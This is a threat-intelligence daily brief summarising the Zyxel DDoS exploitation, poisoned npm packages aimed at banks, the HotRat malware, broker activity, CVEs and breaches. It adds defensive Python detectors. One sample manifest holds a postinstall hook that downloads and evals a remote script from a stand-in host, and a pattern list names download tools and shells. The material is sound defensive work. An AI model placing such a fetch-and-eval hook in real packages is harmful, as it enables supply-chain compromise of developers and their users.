
ZeroFox Daily Intelligence Brief - July 24, 2023

by Alpha Team



ZeroFox Intelligence collects, curates, and analyzes information derived from open and proprietary sources. Please find today’s daily roundup to give you and your clients an advantage over the adversary.

Brief Highlights

  • Unpatched Zyxel Vulnerability Exposes Organizations to Persistent DDoS Attacks
  • Malware Targeting Banks via Open Source Supply Chain
  • AsyncRAT Variant Malware HotRat Spreading Through Pirated Software
  • Threat Activity (initial-access brokers, data brokers, and hacktivists): NulledBB: Actor Shares 253,000 Compromised Email Accounts; HackForums: Actor Selling Student Email Accounts for Amazon Prime
  • Vulnerabilities: CVE-2023-28133 and CVE-2023-3850
  • Exploits: CVE-2020-10220 and CVE-2012-4869
  • Breaches: Telegram: OnionLABS Botnet Breach and Credit Card Data Breach

Unpatched Zyxel Vulnerability Exposes Organizations to Persistent DDoS Attacks

Organizations that have yet to patch a critical (CVSS 9.8) vulnerability in Zyxel network devices face a serious threat. Although Zyxel released a patch on April 25, 2023, the flaw continues to be exploited by threat actors, who use the compromised devices to launch DDoS attacks. Despite warnings from security experts, many vulnerable Zyxel firewalls and VPN devices remain exposed to the internet, and exploit activity against them has surged.

Malware Targeting Banks via Open Source Supply Chain

Threat actors were observed attempting to introduce malware into the software development environments of two banks via poisoned packages published to the Node Package Manager (npm) registry. The attacks used advanced techniques, including attaching malicious functionality to specific components of the victim banks' websites. The malicious packages could execute second-stage payloads, potentially giving the attackers access to the banks' networks and sensitive data.
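A poisoned npm package does not need to be imported by application code to run: npm executes the package's install-time lifecycle scripts automatically during `npm install`, which is where a second-stage download typically hides. The audit below, added here as an illustration and not ZeroFox, npm or the victims' own tooling, walks a set of package.json manifests, reports every install hook, and flags commands that download content, evaluate inline code or contact a remote host. The packages in SAMPLE_PACKAGES (including the "bank-ui-widgets" package and the example.invalid host) are constructed for the example; load_node_modules shows how to apply the same check to a real node_modules tree.

```python
"""
Audit npm manifests for install-time lifecycle scripts that could stage a
second payload.  Added example, not ZeroFox or npm code; the manifests in
SAMPLE_PACKAGES are constructed for illustration.
"""
import json
import re
from pathlib import Path

# Hooks npm runs automatically on `npm install`, before anyone reviews app code.
INSTALL_HOOKS = ("preinstall", "install", "postinstall", "prepare")

# Heuristics for second-stage behaviour inside a hook command: (pattern, reason).
SUSPICIOUS = [
    (r"\b(curl|wget|Invoke-WebRequest|iwr)\b", "downloads content"),
    (r"\bnode\s+-e\b|\beval\(", "executes inline code"),
    (r"base64", "base64-encoded payload"),
    (r"\b(bash|sh|powershell|cmd)\b", "spawns a shell"),
    (r"https?://", "contacts a remote host"),
]


def audit_package(name, manifest):
    """Return one finding per install hook; `reasons` is empty for plain hooks."""
    findings = []
    for hook in INSTALL_HOOKS:
        cmd = manifest.get("scripts", {}).get(hook)
        if not cmd:
            continue
        reasons = [why for pat, why in SUSPICIOUS if re.search(pat, cmd)]
        findings.append({
            "package": name, "hook": hook, "command": cmd, "reasons": reasons,
            # Any install hook deserves a look; one with suspicious content is urgent.
            "severity": "high" if reasons else "review",
        })
    return findings


def audit_tree(packages):
    """packages: mapping of a package label -> its parsed package.json."""
    return [f for name, m in packages.items() for f in audit_package(name, m)]


def load_node_modules(root):
    """Collect every package.json under a node_modules tree, keyed by path so
    that several vendored versions of the same package do not collide."""
    root = Path(root)
    packages = {}
    for manifest in root.rglob("package.json"):
        try:
            data = json.loads(manifest.read_text(encoding="utf-8"))
        except (OSError, ValueError):
            continue  # unreadable or malformed manifest: skip, do not crash the audit
        packages[str(manifest.parent.relative_to(root))] = data
    return packages


# Constructed manifests: two benign packages and one poisoned one.
SAMPLE_PACKAGES = {
    "left-padder": {"name": "left-padder", "version": "1.0.3",
                    "scripts": {"test": "jest"}},
    "ts-helpers": {"name": "ts-helpers", "version": "2.1.0",
                   "scripts": {"prepare": "tsc -p ."}},
    "bank-ui-widgets": {  # hypothetical poisoned package; fetches and evals a stage-2 script
        "name": "bank-ui-widgets", "version": "0.0.1",
        "scripts": {"postinstall":
            "node -e \"require('https').get('https://example.invalid/s2.js',"
            "r=>{let d='';r.on('data',c=>d+=c);r.on('end',()=>eval(d))})\""},
    },
}

if __name__ == "__main__":
    for finding in audit_tree(SAMPLE_PACKAGES):
        print(finding["severity"], finding["package"], finding["hook"], finding["reasons"])
```

Running the script against SAMPLE_PACKAGES reports ts-helpers' prepare hook for review and bank-ui-widgets' postinstall as high. In a CI pipeline the same check pairs well with `npm ci --ignore-scripts`, so that nothing in a fresh dependency tree runs until the flagged hooks have been reviewed.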

AsyncRAT Variant Malware HotRat Spreading Through Pirated Software

A new variant of the AsyncRAT malware called HotRat is being distributed through pirated versions of popular video games, image and sound editing tools, and Microsoft Office installers. HotRat lets attackers steal login credentials and cryptocurrency wallets and perform other malicious actions such as screen capture and keylogging. The attack chain bundles cracked software with a malicious AutoHotkey script and uses a Visual Basic Script loader to deploy the HotRat payload. The attack requires administrative privileges to succeed.
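The delivery chain above (a cracked installer run from a user-writable folder, an AutoHotkey script, then a Windows Script Host loader, all needing elevated rights) is visible in ordinary process-creation telemetry. The detector below is an added example, not ZeroFox code or a published HotRat signature: it tags AutoHotkey interpreters and .vbs loaders launched from user-writable paths, raises severity when an installer-like binary from such a path is in the process ancestry, and notes when the process already runs at high integrity. The Sysmon-style events in SAMPLE_EVENTS are constructed, not real telemetry, and the path and integrity-level fields are assumptions about the log format.

```python
"""
Heuristic detection for the cracked-installer -> AutoHotkey -> VBScript loader
chain described above.  Added example, not ZeroFox code; SAMPLE_EVENTS are
constructed process-creation records, not real telemetry.
"""
import re

# Paths a standard user can write to; interpreters started from here deserve
# more scrutiny than those under Program Files or System32.
USER_WRITABLE = re.compile(
    r"\\(?:Users\\[^\\]+\\(?:Downloads|AppData|Desktop)|Temp|ProgramData)\\", re.I)
SCRIPT_HOSTS = {"wscript.exe", "cscript.exe"}
INSTALLER_WORDS = re.compile(r"setup|install|crack|keygen|patch", re.I)


def basename(path):
    return path.rsplit("\\", 1)[-1].lower()


def is_vbs_loader(ev):
    """Windows Script Host running a .vbs that lives in a user-writable location."""
    return (basename(ev["image"]) in SCRIPT_HOSTS
            and re.search(r"\.vbs\b", ev["command_line"], re.I) is not None
            and USER_WRITABLE.search(ev["command_line"]) is not None)


def is_autohotkey(ev):
    """AutoHotkey interpreter, or any process handed an .ahk script."""
    return ("autohotkey" in basename(ev["image"])
            or re.search(r"\.ahk\b", ev["command_line"], re.I) is not None)


def is_installer_from_user_path(ev):
    return (USER_WRITABLE.search(ev["image"]) is not None
            and INSTALLER_WORDS.search(basename(ev["image"])) is not None)


def ancestors(ev, by_pid, max_depth=8):
    """Walk the parent chain; bounded so pid reuse or a missing parent cannot loop."""
    chain = []
    cur = by_pid.get(ev["parent_pid"])
    while cur is not None and len(chain) < max_depth:
        chain.append(cur)
        cur = by_pid.get(cur["parent_pid"])
    return chain


def detect(events):
    by_pid = {ev["pid"]: ev for ev in events}
    alerts = []
    for ev in events:
        tags = []
        if is_autohotkey(ev):
            tags.append("autohotkey_script")
        if is_vbs_loader(ev):
            tags.append("vbs_loader_user_path")
        if not tags:
            continue
        if any(is_installer_from_user_path(a) for a in ancestors(ev, by_pid)):
            tags.append("spawned_by_installer_from_user_path")
        if ev.get("integrity") == "High":
            tags.append("elevated")  # the chain needs admin rights to succeed
        severity = "high" if "spawned_by_installer_from_user_path" in tags else "review"
        alerts.append({"pid": ev["pid"], "image": ev["image"],
                       "severity": severity, "tags": tags})
    return alerts


# Constructed Sysmon-style process-creation events (not real telemetry).
SAMPLE_EVENTS = [
    {"pid": 1000, "parent_pid": 4, "image": r"C:\Windows\explorer.exe",
     "command_line": "explorer.exe", "integrity": "Medium"},
    {"pid": 2000, "parent_pid": 1000,
     "image": r"C:\Users\alice\Downloads\PhotoTool_Crack_Setup.exe",
     "command_line": "PhotoTool_Crack_Setup.exe", "integrity": "High"},
    {"pid": 2100, "parent_pid": 2000,
     "image": r"C:\Users\alice\AppData\Local\Temp\AutoHotkey.exe",
     "command_line": r'AutoHotkey.exe "C:\Users\alice\AppData\Local\Temp\update.ahk"',
     "integrity": "High"},
    {"pid": 2200, "parent_pid": 2100, "image": r"C:\Windows\System32\wscript.exe",
     "command_line": r'wscript.exe "C:\Users\alice\AppData\Local\Temp\loader.vbs"',
     "integrity": "High"},
    # Benign: vendor script under Program Files, started from Explorer.
    {"pid": 3000, "parent_pid": 1000, "image": r"C:\Windows\System32\wscript.exe",
     "command_line": r'wscript.exe "C:\Program Files\Vendor\setup.vbs"',
     "integrity": "Medium"},
    # Ambiguous: a .vbs from Downloads with no installer in its ancestry.
    {"pid": 3100, "parent_pid": 1000, "image": r"C:\Windows\System32\wscript.exe",
     "command_line": r'wscript.exe "C:\Users\bob\Downloads\hello.vbs"',
     "integrity": "Medium"},
]

if __name__ == "__main__":
    for alert in detect(SAMPLE_EVENTS):
        print(alert)
```

On the constructed events the AutoHotkey process and the wscript.exe loader both come back as high (installer ancestry plus high integrity), the vendor script under Program Files is ignored, and the stray .vbs in Downloads is queued for review rather than alerted on, which keeps the rule usable on fleets where users legitimately run scripts.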

THREAT ACTIVITY: INITIAL-ACCESS BROKERS, DATA BROKERS, AND HACKTIVISTS

  • NulledBB: Actor Shares 253,000 Compromised Email Accounts
  • HackForums: Actor Selling Student Email Accounts for Amazon Prime

VULNERABILITIES

  • CVE-2023-28133 - Local privilege escalation in Check Point Endpoint Security Client (version E87.30) via crafted OpenSSL configuration file
  • CVE-2023-3850 - Vulnerability rated critical in SourceCodester Lost and Found Information System 1.0

EXPLOITS

  • CVE-2020-10220: Rconfig 3.x - Chained Remote Code Execution (Metasploit)
  • CVE-2012-4869: FreePBX 2.9.0/2.10.0 - 'callmenum' Remote Code Execution (Metasploit)

BREACHES

  • Telegram: OnionLABS Botnet Breach
  • Credit Card Data Breach

Tags: DIB, TLP:GREEN